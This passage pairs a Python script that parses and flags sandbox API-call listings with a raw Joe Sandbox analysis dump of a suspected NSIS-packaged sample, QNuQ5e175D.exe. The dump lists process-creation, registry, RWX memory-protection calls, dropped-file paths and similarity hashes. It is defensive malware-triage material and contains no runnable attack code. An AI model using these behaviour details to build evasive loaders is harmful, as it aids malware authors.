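• WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004034BD,00000000,0041EA20,000000FF,0041EA20,000000FF,000000FF,00000004,00000000), ref: 0040612D
• ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,00403507,00000000,00000000,0040332B,000000FF,00000004,00000000,00000000,00000000), ref: 004060FE
• VirtualProtect.KERNELBASE(6FC4505C,00000004,00000040,6FC4504C), ref: 6FC42A9D
• GetPrivateProfileStringW.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 0040244A
• RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000000,?,?,00000000,?,00406472,?,?,?,?,Call,?,00000000), ref: 00406408
• ShellExecuteExW.SHELL32(?), ref: 00405BAC
  • Part of subcall function 004055FC: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsk3C2D.tmp\System.dll,0040343D,0040343D,Skipped: C:\Users\user\AppData\Local\Temp\nsk3C2D.tmp\System.dll,00000000,00425A20,74DF23A0), ref: 00405657
"""

# Assumed line grammar: "• [Part of subcall function XXXXXXXX: ]Api.MODULE(args), ref: XXXXXXXX"
LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<caller>[0-9A-Fa-f]{8}): )?"
    r"(?P<api>\w+)\.(?P<module>\w+)\((?P<args>.*)\), ref: (?P<ref>[0-9A-Fa-f]{8})\s*$"
)

# Page-protection constants from winnt.h.
PAGE_EXECUTE_READWRITE = 0x40
PAGE_EXECUTE_WRITECOPY = 0x80

# Assumed pattern for files inside an NSIS temporary plugin directory (ns*.tmp).
NSIS_TMP_RE = re.compile(r"[A-Za-z]:\\[^,]*?\\ns\w{1,5}\.tmp\\[^,]+")


def parse_api_line(line):
    """Parse one listing line into a dict, or return None for non-API lines."""
    m = LINE_RE.match(line)
    if not m:
        return None
    return {
        "api": m["api"],
        "module": m["module"],
        "args": m["args"].split(","),
        "ref": int(m["ref"], 16),
        "caller": int(m["caller"], 16) if m["caller"] else None,
    }


def parse_report(text):
    """Collect every parseable API line from a block of report text."""
    return [c for c in (parse_api_line(l) for l in text.splitlines()) if c]


def flag_call(call):
    """Return a short triage note for calls worth a second look, else None."""
    api = call["api"]
    if api == "VirtualProtect" and len(call["args"]) >= 3:
        try:
            prot = int(call["args"][2], 16)  # flNewProtect
        except ValueError:
            return "VirtualProtect with unresolved protection argument"
        if prot & (PAGE_EXECUTE_READWRITE | PAGE_EXECUTE_WRITECOPY):
            return f"executable+writable page protection (0x{prot:02X})"
        return None
    if api == "ShellExecuteExW":
        return "launches an external program/document"
    if api.startswith("RegOpenKeyEx"):
        return "registry access"
    return None


def summarize(calls):
    """Group called API names by the image a call site belongs to.

    Heuristic (assumption): the image base is taken as ref & 0xFFFF0000, which
    holds for the two images on this page (00400000 and 6FC40000).
    """
    by_image = defaultdict(list)
    for c in calls:
        by_image[c["ref"] & 0xFFFF0000].append(c["api"])
    return dict(by_image)


def nsis_plugin_paths(calls):
    """Extract ns*.tmp plugin paths that appear inside string arguments."""
    found = set()
    for c in calls:
        for arg in c["args"]:
            m = NSIS_TMP_RE.search(arg)
            if m:
                found.add(m.group(0))
    return found


if __name__ == "__main__":
    calls = parse_report(SAMPLE_LINES)
    for c in calls:
        note = flag_call(c)
        if note:
            print(f"{c['ref']:08X} {c['api']}.{c['module']}: {note}")
    print(summarize(calls))
    print(nsis_plugin_paths(calls))
```

Run against the whole report rather than this excerpt, the grouping by image is what separates the NSIS stub's own housekeeping calls (file I/O, registry, SendMessageW) from activity in the other loaded images; a writable-and-executable protection change outside the main image is the kind of call site a practitioner would open first in the dump.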
APIs
• GetPrivateProfileStringW.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 0040244A
Memory Dump Source
• Source File: 00000000.00000002.1943050466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1943037269.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1943063335.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1943076050.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1943076050.000000000042F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1943076050.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1943076050.0000000000437000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1943076050.000000000043F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1943076050.0000000000464000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1943239076.0000000000468000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
Similarity
• API ID: PrivateProfileString
• String ID:
• API String ID: 1096422788-0
• Opcode ID: 979b3f2ec0bc23d324c76cc3db4c1f8da93b0e1d0eaca7bbe8bd823efade59bd
• Instruction ID: 53345aa50f94a5dbc05c73a67e8aa0b188b477950ab0ef6c1fe412bbc790425e
• Opcode Fuzzy Hash: 979b3f2ec0bc23d324c76cc3db4c1f8da93b0e1d0eaca7bbe8bd823efade59bd
• Instruction Fuzzy Hash: E7E04F3180021AAADB00AFA0CE0ADAD3678AF00304F10493EF510BB0D1E7F889509759
APIs
• RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000000,?,?,00000000,?,00406472,?,?,?,?,Call,?,00000000), ref: 00406408
Memory Dump Source
• Source File: 00000000.00000002.1943050466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1943037269.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1943063335.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1943076050.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1943076050.000000000042F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1943076050.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1943076050.0000000000437000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1943076050.000000000043F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1943076050.0000000000464000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1943239076.0000000000468000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
Similarity
• API ID: Open
• String ID:
• API String ID: 71445658-0
• Opcode ID: 8ee5b0d2344bda13eae74e7442d869633e0228d129a7f9cdea9876c3f2a2c01f
• Instruction ID: 12ce3b422fe6a0da393528f22193a7488631f194d1dbc4d2354a9349d97d7052
• Opcode Fuzzy Hash: 8ee5b0d2344bda13eae74e7442d869633e0228d129a7f9cdea9876c3f2a2c01f
• Instruction Fuzzy Hash: 34D0123204020DBBEF115F90DD01FAB3B1DEB08310F018836FE06A4091D776D570A758
APIs
• SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015D3
Memory Dump Source
• Source File: 00000000.00000002.1943050466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1943037269.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1943063335.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1943076050.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1943076050.000000000042F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1943076050.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1943076050.0000000000437000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1943076050.000000000043F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1943076050.0000000000464000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1943239076.0000000000468000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
Similarity
• API ID: AttributesFile
• String ID:
• API String ID: 3188754299-0
• Opcode ID: fc4ae7de1a988c572ae2e9f733057e11b5d74982a37415ce069d5c91d6d923cf
• Instruction ID: cd4f68ad1bc4df61111a8e6125a37bec327b368bc2224c93a9ffc6bdd58994c4
• Opcode Fuzzy Hash: fc4ae7de1a988c572ae2e9f733057e11b5d74982a37415ce069d5c91d6d923cf
• Instruction Fuzzy Hash: 74D05B72B08101D7DB00DBE89B49A9E77A4DB50378B31853BD111F11D4D7B8C545A71D
APIs
• SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404554
Memory Dump Source
• Source File: 00000000.00000002.1943050466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1943037269.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1943063335.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1943076050.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1943076050.000000000042F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1943076050.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1943076050.0000000000437000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1943076050.000000000043F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1943076050.0000000000464000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1943239076.0000000000468000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
Similarity
• API ID: MessageSend
• String ID:
• API String ID: 3850602802-0
• Opcode ID: 8dc2ea4a8cffd810c80330d43262312fa0f844130cc7d84a637c392e617d0b66
• Instruction ID: 6ad8b1d984edffd0e08e34c6f36dd165e1dcb54a73607e2b540eae92d4c67d50
• Opcode Fuzzy Hash: 8dc2ea4a8cffd810c80330d43262312fa0f844130cc7d84a637c392e617d0b66
• Instruction Fuzzy Hash: ACC04C717402007BDA209F549D49F1777546790702F1495397351E51E0C674E550D61C
APIs
• SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403267,?), ref: 00403518
Memory Dump Source
• Source File: 00000000.00000002.1943050466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1943037269.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1943063335.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1943076050.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1943076050.000000000042F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1943076050.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1943076050.0000000000437000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1943076050.000000000043F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1943076050.0000000000464000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1943239076.0000000000468000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
Similarity
• API ID: FilePointer
• String ID:
• API String ID: 973152223-0
• Opcode ID: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
• Instruction ID: 1f5c7ae16c2334422adcad36111bde95194575cbdac9b1f52e29a9f6e91cc98e
• Opcode Fuzzy Hash: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
• Instruction Fuzzy Hash: 34B01271240300BFDA214F00DF09F057B21ABA0700F10C034B388380F086711035EB0D
APIs
• SendMessageW.USER32(00000028,?,00000001,00404356), ref: 00404539
Memory Dump Source
• Source File: 00000000.00000002.1943050466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1943037269.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1943063335.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1943076050.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1943076050.000000000042F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1943076050.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1943076050.0000000000437000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1943076050.000000000043F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1943076050.0000000000464000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1943239076.0000000000468000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
Similarity
• API ID: MessageSend
• String ID:
• API String ID: 3850602802-0
• Opcode ID: 5e23afa4ba150cac51e31494d2c9f0ee7f8efb4361c8cf2b7a73957f204a5961
• Instruction ID: 777369a795cbaa9bd4fd16da76cbada5404ff361b75e364c58eeef3f96c31ac9
• Opcode Fuzzy Hash: 5e23afa4ba150cac51e31494d2c9f0ee7f8efb4361c8cf2b7a73957f204a5961
• Instruction Fuzzy Hash: 6BB09235181600AADA115B40DE09F867BA2E7A4701F029438B340640B0CBB210A0DB08
APIs
• ShellExecuteExW.SHELL32(?), ref: 00405BAC
Memory Dump Source
• Source File: 00000000.00000002.1943050466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1943037269.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1943063335.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1943076050.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1943076050.000000000042F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1943076050.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1943076050.0000000000437000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1943076050.000000000043F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1943076050.0000000000464000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1943239076.0000000000468000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
Similarity
• API ID: ExecuteShell
• String ID:
• API String ID: 587946157-0
• Opcode ID: accb29398adcd6f2598047f0fcddae8b07494e52d9cc9fcafc25c5f5f83f3143
• Instruction ID: 080962bbef7e268e86b0d243ececfcd1ad47764945baea7f73af6130fa7b9bd6
• Opcode Fuzzy Hash: accb29398adcd6f2598047f0fcddae8b07494e52d9cc9fcafc25c5f5f83f3143
• Instruction Fuzzy Hash: A9C092F2100201EFE301CF80CB09F067BE8AF54306F028058E1899A060CB788800CB29
APIs
• KiUserCallbackDispatcher.NTDLL(?,004042EF), ref: 00404522
Memory Dump Source
• Source File: 00000000.00000002.1943050466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1943037269.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1943063335.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1943076050.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1943076050.000000000042F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1943076050.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1943076050.0000000000437000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1943076050.000000000043F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1943076050.0000000000464000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1943239076.0000000000468000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
Similarity
• API ID: CallbackDispatcherUser
• String ID:
• API String ID: 2492992576-0
• Opcode ID: faa9f1bbc6a73408ed15535010d366895e2d742fa65bef251b9024de670fa5bb
• Instruction ID: 186c68f4495094c0cebc3eb7279f68ffc90812dad8dfd9e689695b78415bb769
• Opcode Fuzzy Hash: faa9f1bbc6a73408ed15535010d366895e2d742fa65bef251b9024de670fa5bb
• Instruction Fuzzy Hash: 43A00176544A04ABCE12EB50EF4990ABB62BBA4B01B618879A285514388B325921EB19
                                                          APIs
                                                            • Part of subcall function 004055FC: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsk3C2D.tmp\System.dll,00000000,00425A20,74DF23A0,?,?,?,?,?,?,?,?,?,0040343D,00000000,?), ref: 00405634
                                                            • Part of subcall function 004055FC: lstrlenW.KERNEL32(0040343D,Skipped: C:\Users\user\AppData\Local\Temp\nsk3C2D.tmp\System.dll,00000000,00425A20,74DF23A0,?,?,?,?,?,?,?,?,?,0040343D,00000000), ref: 00405644
                                                            • Part of subcall function 004055FC: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsk3C2D.tmp\System.dll,0040343D,0040343D,Skipped: C:\Users\user\AppData\Local\Temp\nsk3C2D.tmp\System.dll,00000000,00425A20,74DF23A0), ref: 00405657
                                                            • Part of subcall function 004055FC: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsk3C2D.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsk3C2D.tmp\System.dll), ref: 00405669
                                                            • Part of subcall function 004055FC: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040568F
                                                            • Part of subcall function 004055FC: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004056A9
                                                            • Part of subcall function 004055FC: SendMessageW.USER32(?,00001013,?,00000000), ref: 004056B7
                                                            • Part of subcall function 00405B5A: CreateProcessW.KERNELBASE(00000000,00437800,00000000,00000000,00000000,04000000,00000000,00000000,0042FA70,?,?,?,00437800,?), ref: 00405B83
                                                            • Part of subcall function 00405B5A: CloseHandle.KERNEL32(?,?,?,00437800,?), ref: 00405B90
                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00402010
                                                            • Part of subcall function 00406A16: WaitForSingleObject.KERNEL32(?,00000064), ref: 00406A27
                                                            • Part of subcall function 00406A16: GetExitCodeProcess.KERNEL32(?,?), ref: 00406A49
                                                            • Part of subcall function 004064BE: wsprintfW.USER32 ref: 004064CB
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1943050466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1943037269.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943063335.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.0000000000464000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943239076.0000000000468000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                                          • String ID:
                                                          • API String ID: 2972824698-0
                                                          • Opcode ID: a427765dcc854a3b2948ff8f1996ec0f646c6c24c00c8af56b9e51dc183c014b
                                                          • Instruction ID: 3bd5da99d2ff211530604a8704e688701187be5a7f5114c752edafe9c60b233e
                                                          • Opcode Fuzzy Hash: a427765dcc854a3b2948ff8f1996ec0f646c6c24c00c8af56b9e51dc183c014b
                                                          • Instruction Fuzzy Hash: 82F0F6329041119BDB20BBA18A895DE76A4CF00318F21803FE202B21C6CBBC4D41AB6E
                                                          APIs
                                                          • Sleep.KERNELBASE(00000000), ref: 004014EA
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1943050466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1943037269.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943063335.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.0000000000464000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943239076.0000000000468000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: Sleep
                                                          • String ID:
                                                          • API String ID: 3472027048-0
                                                          • Opcode ID: 1ea5a5e12aa05b844e6b4a57a4a16afa5e1267f6842beefd722180d43813e619
                                                          • Instruction ID: 33bc48e2b41eb1a57acea8eab1ee3944d72ccc7503d83e75cfd502536df4b4aa
                                                          • Opcode Fuzzy Hash: 1ea5a5e12aa05b844e6b4a57a4a16afa5e1267f6842beefd722180d43813e619
                                                          • Instruction Fuzzy Hash: F9D0A773A146008BD744EBB8BE8549F73E8EB903293215C3BD102E10D1E778C901561C
                                                          APIs
                                                          • GetDlgItem.USER32(?,000003FB), ref: 00404A36
                                                          • SetWindowTextW.USER32(00000000,?), ref: 00404A60
                                                          • SHBrowseForFolderW.SHELL32(?), ref: 00404B11
                                                          • CoTaskMemFree.OLE32(00000000), ref: 00404B1C
                                                          • lstrcmpiW.KERNEL32(Call,0042CA68,00000000,?,?), ref: 00404B4E
                                                          • lstrcatW.KERNEL32(?,Call), ref: 00404B5A
                                                          • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404B6C
                                                            • Part of subcall function 00405BBB: GetDlgItemTextW.USER32(?,?,00000400,00404BA3), ref: 00405BCE
                                                            • Part of subcall function 00406825: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\QNuQ5e175D.exe",74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,0040352D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040383C,?,00000008,0000000A,0000000C), ref: 00406888
                                                            • Part of subcall function 00406825: CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00406897
                                                            • Part of subcall function 00406825: CharNextW.USER32(?,"C:\Users\user\Desktop\QNuQ5e175D.exe",74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,0040352D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040383C,?,00000008,0000000A,0000000C), ref: 0040689C
                                                            • Part of subcall function 00406825: CharPrevW.USER32(?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,0040352D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040383C,?,00000008,0000000A,0000000C), ref: 004068AF
                                                          • GetDiskFreeSpaceW.KERNEL32(0042AA38,?,?,0000040F,?,0042AA38,0042AA38,?,00000001,0042AA38,?,?,000003FB,?), ref: 00404C2F
                                                          • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404C4A
                                                            • Part of subcall function 00404DA3: lstrlenW.KERNEL32(0042CA68,0042CA68,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404E44
                                                            • Part of subcall function 00404DA3: wsprintfW.USER32 ref: 00404E4D
                                                            • Part of subcall function 00404DA3: SetDlgItemTextW.USER32(?,0042CA68), ref: 00404E60
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1943050466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1943037269.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943063335.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.0000000000464000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943239076.0000000000468000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                          • String ID: <c$A$C:\Users\user\AppData\Local\skattekode\Rygtets222\overstadigeres$Call
                                                          • API String ID: 2624150263-3369209954
                                                          • Opcode ID: 716f91307e0c0206c4811f73cf3aa40f2f43fcc6cf09981b0470e9a043fb6368
                                                          • Instruction ID: 819d6111372f9eb468737b2dc9595d459319e5efb98401d1644bfd8e85b56d65
                                                          • Opcode Fuzzy Hash: 716f91307e0c0206c4811f73cf3aa40f2f43fcc6cf09981b0470e9a043fb6368
                                                          • Instruction Fuzzy Hash: 14A180B1901208ABDB11EFA5DD45BAFB7B8EF84314F11803BF601B62D1D77C9A418B69
                                                          APIs
                                                          • CoCreateInstance.OLE32(004085E8,?,00000001,004085D8,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040224E
                                                          Strings
                                                          • C:\Users\user\AppData\Local\skattekode\Rygtets222\overstadigeres, xrefs: 0040228E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1943050466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1943037269.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943063335.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.0000000000464000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943239076.0000000000468000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: CreateInstance
                                                          • String ID: C:\Users\user\AppData\Local\skattekode\Rygtets222\overstadigeres
                                                          • API String ID: 542301482-2593783087
                                                          • Opcode ID: 99423ef168fa0dc7d563ab215b90f00d26a2448a52d76e49bcb10065e06d2d2e
                                                          • Instruction ID: 879178e2914a864b6efeea5842d2d3985b85c893096dfa9a9f6c7732eb85e553
                                                          • Opcode Fuzzy Hash: 99423ef168fa0dc7d563ab215b90f00d26a2448a52d76e49bcb10065e06d2d2e
                                                          • Instruction Fuzzy Hash: D1412571A00209AFCB00DFE4CA89A9D7BB5FF48318B20457EF505EB2D1DB799981CB54
                                                          APIs
                                                          • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040293F
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1943050466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1943037269.0000000000400000.00000002.00000001.01000000.00000003.sdmp
